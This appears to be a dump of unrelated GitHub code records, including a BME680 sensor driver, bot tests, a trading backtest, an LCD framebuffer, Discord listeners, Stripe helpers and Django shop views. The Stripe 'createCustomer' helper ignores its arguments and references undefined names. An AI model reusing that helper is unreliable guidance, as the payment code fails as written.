raw) and (type(calibrate) is dict):\n for k in calibrate.keys():\n if not k in self.calibrate.keys(): continue\n if (k != 'gas_base') and (not type(calibrate[k]) is list):\n continue\n self.calibrate[k] = calibrate[k]\n\n self._debug = debug\n # Default oversampling and filter register values.\n self._pressure_oversample = 0b011\n self._temp_oversample = 0b100\n self._humidity_oversample = 0b010\n self._filter = 0b010\n\n self._adc_pres = None\n self._adc_temp = None\n self._adc_hum = None\n self._adc_gas = None\n self._gas_range = None\n self._t_fine = None\n self.hum_base = 80.0 # 80.0 outdoor best, 40.0-50.0 indoor best\n self.hum_weight = 0.25 # calculation of AQ score (25:75, humidity:gas)\n self._t_fine = None\n self._status = 0\n self.gas_base = self.calibrate['gas_base']\n\n self._last_reading = 0\n self._min_refresh_time = int(1 / refresh_rate * 1000) # in milli secs\n\n @property\n def pressure_oversample(self):\n \"\"\"The oversampling for pressure sensor\"\"\"\n return _BME680_SAMPLERATES[self._pressure_oversample]\n\n # calibrate by length calibration factor (Taylor) array\n def _calibrate(self,cal,value):\n if self.raw: return value\n if (not cal) or (type(cal) != list):\n return round(value,2)\n if type(value) is int: value = float(value)\n if not type(value) is float:\n return None\n rts = 0; pow = 0\n for a in cal:\n rts += a*(value**pow)\n pow += 1\n return rts\n\n @pressure_oversample.setter\n def pressure_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._pressure_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def humidity_oversample(self):\n \"\"\"The oversampling for humidity sensor\"\"\"\n return _BME680_SAMPLERATES[self._humidity_oversample]\n\n @humidity_oversample.setter\n def humidity_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._humidity_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def temperature_oversample(self):\n \"\"\"The oversampling for temperature sensor\"\"\"\n return _BME680_SAMPLERATES[self._temp_oversample]\n\n @temperature_oversample.setter\n def temperature_oversample(self, sample_rate):\n if sample_rate in _BME680_SAMPLERATES:\n self._temp_oversample = _BME680_SAMPLERATES.index(sample_rate)\n else:\n raise RuntimeError(\"Invalid oversample\")\n\n @property\n def filter_size(self):\n \"\"\"The filter size for the built in IIR filter\"\"\"\n return _BME680_FILTERSIZES[self._filter]\n\n @filter_size.setter\n def filter_size(self, size):\n if size in _BME680_FILTERSIZES:\n self._filter = _BME680_FILTERSIZES.index(size)\n else:\n raise RuntimeError(\"Invalid size\")\n\n @property\n def temperature(self):\n \"\"\"The compensated temperature in degrees celsius.\"\"\"\n self._perform_reading()\n calc_temp = ((self._t_fine * 5) + 128) / 256\n return self._calibrate(self.calibrate['temperature'],calc_temp / 100) #\n\n @property\n def pressure(self):\n \"\"\"The barometric pressure in hectoPascals\"\"\"\n self._perform_reading()\n var1 = (self._t_fine / 2) - 64000\n var2 = ((var1 / 4) * (var1 / 4)) / 2048\n var2 = (var2 * self._pressure_calibration[5]) / 4\n var2 = var2 + (var1 * self._pressure_calibration[4] * 2)\n var2 = (var2 / 4) + (self._pressure_calibration[3] * 65536)\n var1 = (\n (((var1 / 4) * (var1 / 4)) / 8192)\n * (self._pressure_calibration[2] * 32)\n / 8\n ) + ((self._pressure_calibration[1] * var1) / 2)\n var1 = var1 / 262144\n var1 = ((32768 + var1) * self._pressure_calibration[0]) / 32768\n calc_pres = 1048576 - self._adc_pres\n calc_pres = (calc_pres - (var2 / 4096)) * 3125\n calc_pres = (calc_pres / var1) * 2\n var1 = (\n self._pressure_calibration[8] * (((calc_pres / 8) * (calc_pres / 8)) / 8192)\n ) / 4096\n var2 = ((calc_pres / 4) * self._pressure_calibration[7]) / 8192\n var3 = (((calc_pres / 256) ** 3) * self._pressure_calibration[9]) / 131072\n calc_pres += (var1 + var2 + var3 + (self._pressure_calibration[6] * 128)) / 16\n return self._calibrate(self.calibrate['pressure'],calc_pres/100) #\n\n @property\n def relative_humidity(self):\n \"\"\"The relative humidity in RH %\"\"\"\n return self.humidity\n\n @property\n def humidity(self):\n \"\"\"The relative humidity in RH %\"\"\"\n self._perform_reading()\n temp_scaled = ((self._t_fine * 5) + 128) / 256\n var1 = (self._adc_hum - (self._humidity_calibration[0] * 16)) - (\n (temp_scaled * self._humidity_calibration[2]) / 200\n )\n var2 = (\n self._humidity_calibration[1]\n * (\n ((temp_scaled * self._humidity_calibration[3]) / 100)\n + (\n (\n (\n temp_scaled\n * ((temp_scaled * self._humidity_calibration[4]) / 100)\n )\n / 64\n )\n / 100\n )\n + 16384\n )\n ) / 1024\n var3 = var1 * var2\n var4 = self._humidity_calibration[5] * 128\n var4 = (var4 + ((temp_scaled * self._humidity_calibration[6]) / 100)) / 16\n var5 = ((var3 / 16384) * (var3 / 16384)) / 1024\n var6 = (var4 * var5) / 2\n calc_hum = (((var3 + var6) / 1024) * 1000) / 4096\n calc_hum /= 1000 # get back to RH\n\n if calc_hum > 100:\n calc_hum = 100\n if calc_hum < 0:\n calc_hum = 0\n return self._calibrate(self.calibrate['humidity'],calc_hum) #\n\n @property\n def altitude(self):\n \"\"\"The altitude based on current ``pressure`` vs the sea level pressure\n (``sea_level_pressure``) - which you must enter ahead of time)\"\"\"\n pressure = self.pressure # in Si units for hPascal\n pressure = 44330 * (1.0 - math.pow(pressure / self.sea_level_pressure, 0.1903)) #\n return self._calibrate(self.calibrate['altitude'],pressure) #\n\n @property\n def gas(self):\n \"\"\"The gas resistance in ohms\"\"\"\n self._perform_reading()\n var1 = (\n (1340 + (5 * self._sw_err)) * (_LOOKUP_TABLE_1[self._gas_range])\n ) / 65536\n var2 = ((self._adc_gas * 32768) - 16777216) + var1\n var3 = (_LOOKUP_TABLE_2[self._gas_range] * var1) / 512\n calc_gas_res = (var3 + (var2 / 2)) / var2\n return int(self._calibrate(self.calibrate['gas'],calc_gas_res)) #\n\n # after https://github.com/pimoroni/bme680-python/tree/master/examples # added\n # burn in and calculate baseline\n def gasBase(self, redo=False, debug=False):\n if redo: self.gas_base = None\n if not self.gas_base is None: return self.gas_base\n BURN_TIME = const(300) # 5 minutes\n if self._debug: debug = True\n if debug:\n print(\"Gas resistance burn-in max: %d minutes\" % (BURN_TIME/60))\n strt_time = time.time(); cur_time = time.time()\n data = []; prev_gas = 0\n stable = False; cnt = 0\n while cur_time - strt_time < BURN_TIME:\n cur_time = time.time()\n gas = self.gas\n if (not stable ) and abs(gas - prev_gas) < 3000:\n if cnt > 3: stable = True\n else: cnt += 1\n elif not stable: cnt = 0\n if ((self._status & 0x30) == 0x30) and stable: # STABLE+GAS VALID\n if len(data) >= 49: data.pop(0)\n data.append(gas)\n if debug: print(\"time: %dm%ds, gas: %d Ohms\" % (int(cur_time-strt_time)/60,int(cur_time-strt_time)%60,gas))\n if len(data) >= 49: break\n else:\n if debug: print(\"time: %dm%ds: heating up %d\" % (int(cur_time-strt_time)/60,int(cur_time-strt_time)%60,gas))\n prev_gas = gas\n time.sleep_ms(800)\n if len(data):\n self.gas_base = float(sum(data[-25:]))/len(data)\n return self.gas_base\n return None\n\n @property\n def AQI(self): # added\n # calculate gas base line. Can take 5 minutes\n if not self.gas_base:\n if not self.gasBase(): return None\n hum_offset = self.humidity - self.hum_base\n gas_offset = self.gas_base - self.gas\n if hum_offset > 0:\n hum_score = (100-self.hum_base-hum_offset)/(100-self.hum_base)*(self.hum_weight*100)\n else:\n hum_score = (self.hum_base + hum_offset) / self.hum_base * (self.hum_weight * 100)\n # Calculate gas_score as the distance from the gas_baseline.\n if gas_offset > 0:\n gas_score = (self.gas / self.gas_base) * (100 - (self.hum_weight * 100))\n else:\n gas_score = 100 - (self.hum_weight * 100)\n # Calculate air_quality_score.\n return hum_score + gas_score\n\n def _perform_reading(self):\n \"\"\"Perform a single-shot reading from the sensor and fill internal data structure for\n calculations\"\"\"\n # if time.monotonic() - self._last_reading < self._min_refresh_time:\n if time.ticks_ms() < time.ticks_add(self._last_reading,self._min_refresh_time):\n return\n\n # set filter\n self._write(_BME680_REG_CONFIG, [self._filter << 2])\n # turn on temp oversample & pressure oversample\n self._write(\n _BME680_REG_CTRL_MEAS,\n [(self._temp_oversample << 5) | (self._pressure_oversample << 2)],\n )\n # turn on humidity oversample\n self._write(_BME680_REG_CTRL_HUM, [self._humidity_oversample])\n # gas measurements enabled\n self._write(_BME680_REG_CTRL_GAS, [_BME680_RUNGAS])\n\n ctrl = self._read_byte(_BME680_REG_CTRL_MEAS)\n ctrl = (ctrl & 0xFC) | 0x01 # enable single shot!\n self._write(_BME680_REG_CTRL_MEAS, [ctrl])\n new_data = False\n while not new_data:\n data = self._read(_BME680_REG_MEAS_STATUS, 15)\n new_data = data[0] & 0x80 != 0\n time.sleep_ms(5)\n self._last_reading = time.ticks_ms() # time.monotonic()\n self._status = data[0] & 0xF #\n\n self._adc_pres = _read24(data[2:5]) / 16\n self._adc_temp = _read24(data[5:8]) / 16\n self._adc_hum = struct.unpack(\">H\", bytes(data[8:10]))[0]\n self._adc_gas = int(struct.unpack(\">H\", bytes(data[13:15]))[0] / 64)\n self._gas_range = data[14] & 0x0F\n self._status |= data[14] & 0x30 # GASM VALID + HEAT STABLE mask #\n\n var1 = (self._adc_temp / 8) - (self._temp_calibration[0] * 2)\n var2 = (var1 * self._temp_calibration[1]) / 2048\n var3 = ((var1 / 2) * (var1 / 2)) / 4096\n var3 = (var3 * self._temp_calibration[2] * 16) / 16384\n self._t_fine = int(var2 + var3)\n\n def _read_calibration(self):\n \"\"\"Read & save the calibration coefficients\"\"\"\n coeff = self._read(_BME680_BME680_COEFF_ADDR1, 25)\n coeff += self._read(_BME680_BME680_COEFF_ADDR2, 16)\n\n coeff = list(struct.unpack(\" %s\" % (register, [hex(i) for i in result]))\n return result\n\n def _write(self, register, values):\n \"\"\"Writes an array of 'length' bytes to the 'register'\"\"\"\n buffer = bytearray(2 * len(values))\n for i, value in enumerate(values):\n buffer[2 * i] = register + i\n buffer[2 * i + 1] = value\n with self._i2c as i2c:\n i2c.write(buffer)\n if self._debug:\n print(\"\\t$%02X <= %s\" % (values[0], [hex(i) for i in values[1:]]))\n\n\n# deleted class Adafruit_BME680_SPI(Adafruit_BME680):\n","repo_name":"teusH/MySense","sub_path":"PyCom/lib/BME680.py","file_name":"BME680.py","file_ext":"py","file_size_in_byte":17537,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"3"} +{"seq_id":"29027973567","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom mock import patch\n\nfrom utils import handle_utterance, get_tickets_example\n\ntickets_jsons, tickets_text = get_tickets_example()\n\n\ndef test_get_top5_tikcets_1(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = []\n handle_utterance(tg_app, uid, 'мои тикеты', 'Тикетов нет')\n\n\ndef test_get_top5_tikcets_2(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = None\n handle_utterance(\n tg_app,\n uid,\n 'мои тикеты',\n 'У меня что-то пошло не так при запросе к стартреку... Ох, давай попробуем еще раз чуток попозже?'\n )\n\n\ndef test_get_top5_tikcets_3(uid, tg_app):\n with patch('uhura.lib.callbacks.get_top5_tickets') as m:\n m.return_value = tickets_jsons\n text = '5 последних обновленных тикетов, где ты исполнитель:\\n' + tickets_text\n handle_utterance(tg_app, uid, 'мои тикеты', text)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/test_get_top5_tickets.py","file_name":"test_get_top5_tickets.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70886385683","text":"from strategy import shootingStar as ss\nfrom util import utils\nimport pickle\n\n# files are pair_wise and time_frame_wise\npairs = ['ltcusd', 'btcusd', 'xmrbtc', 'ethusd', 'ethbtc', 'etcusd', 'etcbtc', 'xrpusd']\n# run for 15m if enough time\ntime_frames = ['30m', '1h', '3h', '6h', '12h', '1D']\n\nresult = []\n\ndef get_history(file_name):\n pickle_file = open('data/'+file_name, 'rb')\n data = pickle.load(pickle_file)\n pickle_file.close()\n return data\n\nfor time_frame in time_frames:\n for pair in pairs:\n file_name = pair + '_'+ time_frame\n data = get_history(file_name)\n\n # shooting star\n for window_size in range(5, 21):\n small_body = 0.05\n while small_body <= 0.50:\n lower_wick = 0\n while lower_wick < 1.00:\n w_start = 0\n correct = 0\n identify = 0\n while w_start != data.shape[0] - 2 * window_size:\n # do this for all the strategies...\n uptrend = utils.__uptrend(data['close'][w_start: w_start + window_size].values, window_size)\n downtrend = utils.__downtrend(data['close'][w_start: w_start + window_size].values, window_size)\n\n # shooting star\n shooting_star = ss.shooting_star(data, w_start, window_size, lower_wick, small_body)\n if uptrend and shooting_star:\n # verify if it is followed by a downtrend\n downtrend = utils.__downtrend(\n data['close'][w_start + window_size + 1:w_start + 2 * window_size + 1].values, window_size)\n if downtrend:\n print('up_down')\n correct += 1\n identify += 1\n w_start += 1\n # get accuracy\n try:\n accuracy = correct * 1.0 / identify\n except:\n # trading strategy was identified 0 times.\n accuracy = -1\n # store accuracy found with current variables\n result.append([accuracy, identify, time_frame, window_size, small_body, lower_wick])\n # print(result)\n print(str(lower_wick) + ' ' + str(small_body) + ' ' + str(window_size) + ' ' + str(accuracy) + ' ' + str(identify))\n lower_wick += 0.1\n small_body += 0.05\n out = open(file_name + '_acc_shooting_star', 'wb')\n pickle.dump(result, out)\n out.close()","repo_name":"CryptoBullMarket/TradingStrategies","sub_path":"get_accuracy.py","file_name":"get_accuracy.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"30132877610","text":"import lm1125_charset\n\nimport sys\nimport copy\n\nif sys.version_info.major < 3:\n\tas_integer = ord\n\tinput = lambda prompt = '': raw_input(prompt).decode('utf-8')\n\tto_bytestring = lambda list: ''.join(map(chr, list))\nelse:\n\tas_integer = lambda x: x\n\tto_bytestring = lambda list: bytes(list)\n\nclass LCD_framebuffer:\n\tdef __init__(self, write, width, height):\n\t\tself.lcd_write = write\n\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.cursor_row = 0\n\t\tself.cursor_column = 0\n\n\t\tself.framebuffer = None\n\t\tself.old_framebuffer = None\n\t\t\n\t\tself.clear_screen()\n\t\tself.sync()\n\t\n\tdef clear_screen(self):\n\t\tself.framebuffer = [[0x20 for i in range(self.width)] for i in range(self.height)]\n\t\n\tdef sync(self):\n\t\t# Iterate through every line and print to screen\n\t\tfor row in range(self.height):\n\t\t\tif not self.old_framebuffer or self.framebuffer[row] != self.old_framebuffer[row]:\n\t\t\t\tself.lcd_write(to_bytestring(self.framebuffer[row]), row)\n\t\tself.old_framebuffer = copy.deepcopy(self.framebuffer)\n\n\tdef dimensions(self):\n\t\treturn (self.width, self.height)\n\t\n\tdef get_cursor(self):\n\t\treturn (self.cursor_row, self.cursor_column)\n\t\n\tdef set_cursor(self, row, column):\n\t\tif row in range(self.height) and column in range(self.width):\n\t\t\tself.cursor_row = row\n\t\t\tself.cursor_column = column\n\t\telse:\n\t\t\traise IndexError('Cursor outside of screen')\n\t\n\tdef __write_character(self, character):\n\t\t# NOTE: Character needs to be in lm1125 encoding\n\t\tif character == 10: # \\n\n\t\t\t# Special handling for newline:\n\t\t\tself.cursor_row += 1\n\t\t\tself.cursor_column = 0\n\t\telse:\n\t\t\t# Write character into the framebuffer\n\t\t\tself.framebuffer[self.cursor_row][self.cursor_column] = character\n\t\t\t# Advance the cursor\n\t\t\tself.cursor_column += 1\n\t\t\n\t\t# If cursor went past end of the line, move to new line\n\t\tif self.cursor_column >= self.width:\n\t\t\tself.cursor_row += self.cursor_column // self.width\n\t\t\tself.cursor_column = self.cursor_column % self.width\n\t\t\n\t\t# If cursor went past end of screen, scroll the screen\n\t\tif self.cursor_row >= self.height:\n\t\t\t# Last line is self.height - 1, so the line after that (where need scroll_amount = 1), is self.height\n\t\t\tscroll_amount = self.cursor_row - self.height + 1\n\t\t\t\n\t\t\tfor row in range(self.height):\n\t\t\t\tif row + scroll_amount < self.height:\n\t\t\t\t\t# There is a valid row to copy on top of this\n\t\t\t\t\tself.framebuffer[row] = self.framebuffer[row + scroll_amount]\n\t\t\t\telse:\n\t\t\t\t\t# No rows to copy, use an empty one\n\t\t\t\t\tself.framebuffer[row] = [0x20 for i in range(self.width)]\n\t\t\t\n\t\t\tself.cursor_row -= scroll_amount\n\t\n\tdef write(self, string):\n\t\tstring_encoded = lm1125_charset.encode(string)\n\t\tfor character in string_encoded:\n\t\t\tself.__write_character(as_integer(character))\n\nif __name__ == '__main__':\n\timport lcd\n\t# Assumes `lcd.write(text, row)` takes a bytestring in the lm1125 character encoding and writes it on the display in the specified row and `lcd.width()` and `lcd.height()` return its dimensions.\n\tframebuffer = LCD_framebuffer(write = lcd.write, height = lcd.height(), width = lcd.width())\n\n\twhile True:\n\t\ttry:\n\t\t\tcommand = input('> ')\n\t\texcept EOFError:\n\t\t\tbreak\n\n\t\tif command == 'clear':\n\t\t\tframebuffer.clear_screen()\n\t\t\tframebuffer.sync()\n\n\t\telif command == 'cursor':\n\t\t\trow, column = framebuffer.get_cursor()\n\t\t\tprint('Row: %i Column: %i' % (row, column))\n\n\t\telif command == 'dimensions':\n\t\t\twidth, height = framebuffer.dimensions()\n\t\t\tprint('Rows: %i Columns: %i' % (height, width))\n\n\t\telif command == 'help':\n\t\t\tprint(' clear - clear the screen')\n\t\t\tprint(' cursor - get cursor position')\n\t\t\tprint(' dimensions - print the dimensions of the screen')\n\t\t\tprint(' help - print this message')\n\t\t\tprint(' newline - print a newline to screen')\n\t\t\tprint(' move - move cursor')\n\t\t\tprint(' text - print text to screen')\n\t\t\tprint(' ^D - exit')\n\t\t\n\t\telif command == 'move':\n\t\t\trow = int(input('row: '))\n\t\t\tcolumn = int(input('column: '))\n\n\t\t\ttry:\n\t\t\t\tframebuffer.set_cursor(row, column)\n\t\t\texcept IndexError:\n\t\t\t\tprint('Given cursor position outside of range')\n\n\t\telif command == 'newline':\n\t\t\tframebuffer.write('\\n')\n\t\t\tframebuffer.sync()\n\n\t\telif command == 'text':\n\t\t\ttext = input('text: ')\n\t\t\tframebuffer.write(text)\n\t\t\tframebuffer.sync()\n\n\t\telse:\n\t\t\tprint('Unrecognised command \"%s\"' % command)\n","repo_name":"JuEeHa/lm1125","sub_path":"lcd_framebuffer.py","file_name":"lcd_framebuffer.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39341339343","text":"from discord.ext.bridge.core import BridgeOption\nfrom discord import NotFound, ApplicationCommandInvokeError\nfrom discord.ext import bridge\nfrom discord.ext.commands import (\n CommandNotFound,\n CommandInvokeError,\n CheckFailure,\n ConversionError\n)\nimport discord\n\nfrom utility.common import command\nfrom utility.common.errors import NaughtyError\n\nimport os\nimport logging\nimport json\nfrom urllib.parse import quote, quote_plus\n\n\nwith open('tokens.json') as file:\n tokens: dict[str, str] = json.loads(file.read())\n\ndef _parse_text(text: str) -> str:\n for value in tokens.values():\n for value in [value, quote(value), quote_plus(value)]:\n text = text.replace(value, '')\n return text\n\nasync def _parse_error(\n ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext,\n error: Exception\n) -> Exception | None:\n if isinstance(error, CommandNotFound):\n # ignores the error if it just didnt find the command\n return\n if isinstance(error, CheckFailure):\n await ctx.message.add_reaction('👎')\n return\n if isinstance(error, NaughtyError):\n return\n if isinstance(error, ConversionError):\n error = [arg for arg in error.args if not isinstance(arg, BridgeOption)]\n error = error[0] or None\n return error\n\ndef _log_error(error: Exception) -> None:\n logger = logging.getLogger(f'discord.{type(error).__name__}')\n logger.log(\n msg=str(error),\n level=logging.ERROR\n )\n\ndef create_error_embed(error):\n embed = discord.Embed(\n color=0xFF0000,\n fields=[],\n title='Something went wrong!'\n )\n error_text = _parse_text(str(error))\n embed.description = f'```{error_text[:4090]}```'\n embed.set_footer(\n icon_url='https://cdn.discordapp.com/emojis/992830317733871636.gif',\n text=type(error).__name__\n )\n return embed\n\nclass Listeners:\n \"\"\"\n All the listeners to be added to the bot\n \"\"\"\n def __init__(self, bot: bridge.Bot) -> None:\n self.bot = bot\n self.logger = logging.getLogger('discord')\n\n async def on_command_error(self, ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext, error: Exception):\n \"\"\"\n When command raises an exception\n \"\"\"\n if isinstance(error, CommandInvokeError):\n error = error.original\n error = await _parse_error(ctx, error)\n if not error:\n return\n _log_error(error)\n embed = create_error_embed(error)\n await command.respond(ctx, embed=embed)\n\n async def on_application_command_error(self, ctx: bridge.BridgeExtContext | bridge.BridgeApplicationContext, error):\n \"\"\"\n When application command raises an exception\n \"\"\"\n if isinstance(error, ApplicationCommandInvokeError):\n error = error.original\n error = await _parse_error(ctx, error)\n if not error:\n return\n _log_error(error)\n \n embed = create_error_embed(error)\n await command.respond(ctx, embed=embed)\n \n async def on_error(self, error, *args, **kwargs):\n self.logger.log(\n msg=str(error),\n level=logging.ERROR\n )\n\n async def on_member_join(self, member: discord.Member):\n try:\n await member.send('omg hiii :3')\n finally:\n await member.guild.system_channel.send(f'omg hiii :3 <@{member.id}>')\n\n async def on_ready(self):\n \"\"\"\n Run once the bot is ready. Clears the terminal and prints 'ready'\n \"\"\"\n os.system('cls' if os.name == 'nt' else 'clear')\n print('ready')\n","repo_name":"Salabombou/koodaamos-amazing-discord-bot","sub_path":"utility/discord/listeners.py","file_name":"listeners.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21232870133","text":"#######################################\n# Helper functions for the stripe API #\n#######################################\n\nimport stripe\n\ndef createCustomer(email, token):\n \"\"\"\n Creates a Stripe API Customer resource\n \"\"\"\n customer = stripe.Customer.create(\n email=current_user.email,\n source=request.form['stripeToken']\n )\n\n return customer.id\n\ndef createSubscription(customer_id, plan):\n \"\"\"\n Creates a Stripe API Subscription resource\n \"\"\"\n subscription = stripe.Subscription.create(\n customer=customer_id,\n items=[\n {\n \"plan\": plan\n }\n ]\n )\n\n return subscription.id","repo_name":"laskeym/carwash_site","sub_path":"app/lib/stripe.py","file_name":"stripe.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72417727761","text":"# Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.\n\n\nPOWERS = {\n 0: 0,\n 1: 1,\n 2: 2 ** 5,\n 3: 3 ** 5,\n 4: 4 ** 5,\n 5: 5 ** 5,\n 6: 6 ** 5,\n 7: 7 ** 5,\n 8: 8 ** 5,\n 9: 9 ** 5,\n}\n\n\ndef is_sum(n):\n acc = 0\n original_n = n\n\n while n:\n n, last_digit = divmod(n, 10)\n acc += POWERS[last_digit]\n\n if acc == original_n:\n return True\n else:\n return False\n\n\n# Using powers of 10 because 999999 gives 354294: it's the first number with all 9s, which is also larger than the sum of the powers of the digits\ndef sum_numbers_sum_Nth_power(N):\n return sum([n for n in range(2, 10 ** (N + 1)) if is_sum(n)])\n\n\nif __name__ == \"__main__\":\n print(sum_numbers_sum_Nth_power(5))\n","repo_name":"DavideFauri/euler","sub_path":"Python 3/Problem_030.py","file_name":"Problem_030.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11863637703","text":"'''\r\nAuthor: Scott Field\r\nVersion: 1.00\r\nDate: 2/28/2023\r\nProgram Name: Transformers_Class_Storage\r\nProgram Purpose: Stores The Classes For The Tkinter Window For The Transformers TCG_Deck_Builder.py file\r\nThis program is called by the TranformersTCG_Deck_Builder.py file\r\n'''\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom Transformers_Card_Data import *\r\n\r\n\r\n#Class For Displaying Labels That Need To Store Numbers\r\nclass ThemedLabel(Label):\r\n def __init__(self,frame,text,current_number,total_number = None):\r\n #get the frame the label will deploy in\r\n self.frame = frame\r\n\r\n #get the number value that represents how much has been added\r\n self.current_number = current_number\r\n #get the number value that represents the max to be added\r\n self.total_number = total_number\r\n\r\n #convert current number to string for output\r\n self.current_string = str(current_number)\r\n #convert max number value to string for output\r\n self.total_string = str(total_number)\r\n\r\n #format the output total\r\n if (self.total_number!= None):\r\n self.total = \" \" + \"(\" + self.current_string + \"/\" + self.total_string + \")\"\r\n else:\r\n self.total = \" \" + \"(\" + self.current_string + \")\"\r\n\r\n #add the output text to class\r\n self.text = text\r\n #add the text and ouput total to the output string\r\n self.output = self.text + self.total\r\n\r\n #Inherit attributes of label\r\n Label.__init__(self,frame,text = self.output)\r\n\r\n #return the current number\r\n def getCurrentNumber(self):\r\n return self.current_number\r\n \r\n #return the total number\r\n def getTotalNumber(self):\r\n return self.total_number\r\n \r\n #return the complete text \r\n def getText(self):\r\n return self.output\r\n \r\n def setCurrentNumber(self,number):\r\n #increase current displayed number by number\r\n self.current_number = number\r\n self.current_string = str(self.current_number)\r\n #format the output total\r\n #if their is a total number set total to format 1\r\n if (self.total_number!= None):\r\n #set format 1\r\n self.total = \" \" + \"(\" + self.current_string + \"/\" + self.total_string + \")\"\r\n #if their is not a total number set total to format 2\r\n else:\r\n #set format 2\r\n self.total = \" \" + \"(\" + self.current_string + \")\"\r\n #add the output text to the current text\r\n self.output = self.text + self.total\r\n self.config(text = self.output)\r\n\r\n\r\n#Change The Colors Of All ttk buttons\r\nclass ThemedButton(Button):\r\n #initailize class\r\n def __init__(self,frame,text,Mybackground,command):\r\n self.frame = frame\r\n self.text = text\r\n #Mybackground distinguishes which background is the parameter\r\n self.background = Mybackground\r\n self.command = command\r\n #Inherit attributes of ttk.button\r\n Button.__init__(self,self.frame,text = self.text, command = self.command)\r\n\r\n #Create New Style For Button\r\n self.style = Style()\r\n #Set Style To Alternate\r\n self.style.theme_use('alt')\r\n #Configure New Style Name & Color\r\n self.style.configure('TButton', background = Mybackground)\r\n\r\n #method to change color to provided color\r\n def changeColor(self,color):\r\n #change the style\r\n self.style.configure('TButton', background = color)\r\n #map the style to the button\r\n self.style.map('TButton',background = [('active',color)])\r\n #method to change text to provided text\r\n def setText(self,newText):\r\n #configure text equal to the new text\r\n self.configure(text = newText)\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"perspace42/Transformers-TCG-Deck-Builder","sub_path":"Transformers_Class_Storage.py","file_name":"Transformers_Class_Storage.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078138567","text":"import os\nimport execute\n\ndef check(config_folder,junk):\n with open(os.path.join(config_folder, 'os_packages'), 'wb') as out:\n for possible in (\n 'dpkg -l',\n 'yum list',\n 'up2date --showall',\n ):\n if execute.returncode('which '+possible.split()[0])!=0:\n continue\n out.write(execute.simple(possible))\n return ''\n return 'Could not find package manager!'\n \n","repo_name":"simplistix/checker","sub_path":"checker/checkers/os_packages.py","file_name":"os_packages.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26859206793","text":"from django.contrib import messages\r\nfrom django.shortcuts import get_object_or_404, redirect, render\r\nfrom django.urls import reverse\r\nfrom django.views import View\r\nfrom django.views.generic.detail import DetailView\r\nfrom django.views.generic.list import ListView\r\n\r\nfrom perfil.models import Perfil\r\n\r\nfrom . import models\r\n\r\n\r\nclass ListaProdutos(ListView):\r\n model = models.Produto\r\n template_name = 'produto/lista.html'\r\n context_object_name = 'produtos'\r\n paginate_by = 10\r\n\r\n\r\nclass DetalheProdutos(DetailView):\r\n model = models.Produto\r\n template_name = 'produto/detalhe.html'\r\n context_object_name = 'produto'\r\n slug_url_kwarg = 'slug'\r\n\r\n\r\nclass AdicionarAoCarinho(View):\r\n def get(self, *args, **kwargs):\r\n http_referer = self.request.META.get(\r\n 'HTTP_REFERER',\r\n reverse('produto:lista')\r\n )\r\n variacao_id = self.request.GET.get('vid')\r\n\r\n if not variacao_id:\r\n messages.error(self.request, \"Produto não existe\")\r\n\r\n return redirect(http_referer)\r\n\r\n variacao = get_object_or_404(models.Variacao, id=variacao_id)\r\n\r\n variacao_estoque = variacao.estoque\r\n\r\n produto = variacao.produto\r\n produto_id = produto.id\r\n produto_nome = produto.nome\r\n variacao_nome = variacao.name or ''\r\n preco_unitario = variacao.preco\r\n preco_unitario_promocional = variacao.preco_promocional\r\n slug = produto.slug\r\n imagem = produto.imagem\r\n\r\n if imagem:\r\n imagem = imagem.name\r\n else:\r\n imagem = ''\r\n\r\n if variacao.estoque < 1:\r\n messages.error(self.request, \"Indisponivel em Estoque\")\r\n\r\n return redirect(http_referer)\r\n\r\n if not self.request.session.get('carrinho'):\r\n self.request.session['carrinho'] = {}\r\n self.request.session.save()\r\n\r\n carrinho = self.request.session['carrinho']\r\n\r\n if variacao_id in carrinho:\r\n quantidade_carrinho = carrinho[variacao_id]['quantidade']\r\n quantidade_carrinho += 1\r\n\r\n if variacao_estoque < quantidade_carrinho:\r\n messages.warning(\r\n self.request,\r\n f'Estoque insuficiente para {quantidade_carrinho}x no'\r\n f'produto \"{produto_nome}\". adicionamos {variacao_estoque}'\r\n f'x \"{produto_nome}\" no seu carrinho.'\r\n )\r\n quantidade_carrinho = variacao_estoque\r\n\r\n carrinho[variacao_id]['quantidade'] = 